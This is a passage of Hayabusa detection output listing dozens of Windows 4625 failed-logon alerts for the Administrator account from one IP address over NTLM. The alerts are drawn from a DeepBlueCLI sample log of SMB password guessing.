NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: 